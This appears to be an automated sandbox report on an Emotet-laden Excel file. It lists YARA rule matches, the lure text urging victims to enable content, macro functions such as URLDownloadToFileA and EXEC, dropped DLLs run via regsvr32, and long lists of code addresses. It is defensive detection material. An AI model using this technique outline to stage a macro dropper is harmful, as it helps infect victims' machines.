            Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
            Source: Screenshot number: 4Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
            Source: Screenshot number: 8Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 Gb 9 10 11 12 13 14 15 1
            Source: Screenshot number: 8Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 Gb 9 10 11 12 13 14 15 16 17 18 19 20 21 22
            Source: Document image extraction number: 0Screenshot OCR: Enable Editing and click Enable Content.
            Source: Document image extraction number: 0Screenshot OCR: Enable Content.
            Source: Document image extraction number: 1Screenshot OCR: Enable Editing and click Enable Content.
            Source: Document image extraction number: 1Screenshot OCR: Enable Content.
            Found malicious Excel 4.0 Macro
            Source: documentazione 68668.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
            Source: documentazione 68668.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
            Office process drops PE file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dllJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\wdusx2.ocxJump to dropped file
            Found Excel 4.0 Macro with suspicious formulas
            Source: documentazione 68668.xlsInitial sample: EXEC
            Source: documentazione 68668.xlsInitial sample: EXEC
            Source: documentazione 68668.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
            Source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: C:\Users\user\Desktop\documentazione 68668.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
            Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\LxvynAbdjmnUIIL\Jump to behavior
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002900006_2_00290000
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180026C086_2_0000000180026C08
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800274186_2_0000000180027418
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800264506_2_0000000180026450
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800170886_2_0000000180017088
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007E9C6_2_0000000180007E9C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180022D146_2_0000000180022D14
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180010D286_2_0000000180010D28
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800207606_2_0000000180020760
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000ADA06_2_000000018000ADA0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800073E86_2_00000001800073E8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800105EC6_2_00000001800105EC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800023EC6_2_00000001800023EC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000EFEC6_2_000000018000EFEC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F1F06_2_000000018001F1F0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180023FF46_2_0000000180023FF4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180022FF46_2_0000000180022FF4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EFF46_2_000000018001EFF4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800021F46_2_00000001800021F4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180005BFC6_2_0000000180005BFC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EC006_2_000000018001EC00
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001A006_2_0000000180001A00
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800010006_2_0000000180001000
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180010C086_2_0000000180010C08
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025E0C6_2_0000000180025E0C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180014C0C6_2_0000000180014C0C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800056106_2_0000000180005610
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800194146_2_0000000180019414
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BA146_2_000000018000BA14
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800246186_2_0000000180024618
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001421C6_2_000000018001421C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000381C6_2_000000018000381C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F6306_2_000000018000F630
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DA386_2_000000018001DA38
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001363C6_2_000000018001363C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024C446_2_0000000180024C44
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800234486_2_0000000180023448
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800092486_2_0000000180009248
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001984C6_2_000000018001984C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800200506_2_0000000180020050
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800122506_2_0000000180012250
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017E506_2_0000000180017E50
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800088586_2_0000000180008858
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800268606_2_0000000180026860
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002666C6_2_000000018002666C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800134706_2_0000000180013470
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E0706_2_000000018001E070
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800112706_2_0000000180011270
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800084706_2_0000000180008470
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800180746_2_0000000180018074
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E4746_2_000000018000E474
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D6786_2_000000018001D678
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021C806_2_0000000180021C80
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800050806_2_0000000180005080
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180006A806_2_0000000180006A80
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000B8806_2_000000018000B880
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E8806_2_000000018000E880
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800222846_2_0000000180022284
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800094886_2_0000000180009488
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D2886_2_000000018000D288
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020C8C6_2_0000000180020C8C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000CA8C6_2_000000018000CA8C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D4906_2_000000018000D490
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A0946_2_000000018001A094
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000EC986_2_000000018000EC98
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800212A06_2_00000001800212A0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800256A06_2_00000001800256A0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800048A06_2_00000001800048A0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D6A46_2_000000018000D6A4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800224A86_2_00000001800224A8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001EAC6_2_0000000180001EAC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002EB06_2_0000000180002EB0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EABC6_2_000000018001EABC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016EC06_2_0000000180016EC0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000CEC06_2_000000018000CEC0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A4D06_2_000000018001A4D0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000FCD06_2_000000018000FCD0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180003ED46_2_0000000180003ED4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180003CE46_2_0000000180003CE4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800248E86_2_00000001800248E8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800012EC6_2_00000001800012EC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800138F06_2_00000001800138F0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800252F46_2_00000001800252F4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180023EFC6_2_0000000180023EFC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013D146_2_0000000180013D14
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800041186_2_0000000180004118
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800121206_2_0000000180012120
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F1216_2_000000018001F121
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011D306_2_0000000180011D30
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800065386_2_0000000180006538
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002413C6_2_000000018002413C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001973C6_2_000000018001973C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800029406_2_0000000180002940
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D5446_2_000000018001D544
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002034C6_2_000000018002034C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020B506_2_0000000180020B50
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180023B546_2_0000000180023B54
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002275C6_2_000000018002275C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002556C6_2_000000018002556C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E9706_2_000000018001E970
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001D746_2_0000000180001D74
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E7786_2_000000018000E778
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018B806_2_0000000180018B80
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001F846_2_0000000180001F84
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013F886_2_0000000180013F88
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001018C6_2_000000018001018C
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FD906_2_000000018001FD90
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015F906_2_0000000180015F90
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D9906_2_000000018000D990
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000EF946_2_000000018000EF94
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180022BA06_2_0000000180022BA0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800031A86_2_00000001800031A8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020DB06_2_0000000180020DB0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001B3B06_2_000000018001B3B0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017BB06_2_0000000180017BB0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C5B46_2_000000018001C5B4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800123C46_2_00000001800123C4
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BFC86_2_000000018000BFC8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800151CC6_2_00000001800151CC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800195D06_2_00000001800195D0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800259D86_2_00000001800259D8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001BDD86_2_000000018001BDD8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800049D86_2_00000001800049D8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C3D86_2_000000018000C3D8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F1D86_2_000000018000F1D8
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800213DC6_2_00000001800213DC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800045DC6_2_00000001800045DC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800089DC6_2_00000001800089DC
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800079E06_2_00000001800079E0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_001200007_2_00120000
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800056107_2_0000000180005610
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800274187_2_0000000180027418
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800200507_2_0000000180020050
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800180747_2_0000000180018074
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800170887_2_0000000180017088
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180007E9C7_2_0000000180007E9C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800212A07_2_00000001800212A0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180022D147_2_0000000180022D14
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800029407_2_0000000180002940
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180023B547_2_0000000180023B54
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800207607_2_0000000180020760
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180015F907_2_0000000180015F90
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000ADA07_2_000000018000ADA0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C5B47_2_000000018001C5B4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800123C47_2_00000001800123C4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800151CC7_2_00000001800151CC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C3D87_2_000000018000C3D8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800073E87_2_00000001800073E8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800105EC7_2_00000001800105EC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800023EC7_2_00000001800023EC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000EFEC7_2_000000018000EFEC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F1F07_2_000000018001F1F0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180023FF47_2_0000000180023FF4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180022FF47_2_0000000180022FF4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001EFF47_2_000000018001EFF4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800021F47_2_00000001800021F4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180005BFC7_2_0000000180005BFC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001EC007_2_000000018001EC00
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001A007_2_0000000180001A00
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800010007_2_0000000180001000
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180026C087_2_0000000180026C08
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180010C087_2_0000000180010C08
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180025E0C7_2_0000000180025E0C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180014C0C7_2_0000000180014C0C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800194147_2_0000000180019414
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BA147_2_000000018000BA14
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800246187_2_0000000180024618
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001421C7_2_000000018001421C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000381C7_2_000000018000381C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F6307_2_000000018000F630
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001DA387_2_000000018001DA38
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001363C7_2_000000018001363C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180024C447_2_0000000180024C44
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800234487_2_0000000180023448
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800092487_2_0000000180009248
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001984C7_2_000000018001984C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800264507_2_0000000180026450
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800122507_2_0000000180012250
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180017E507_2_0000000180017E50
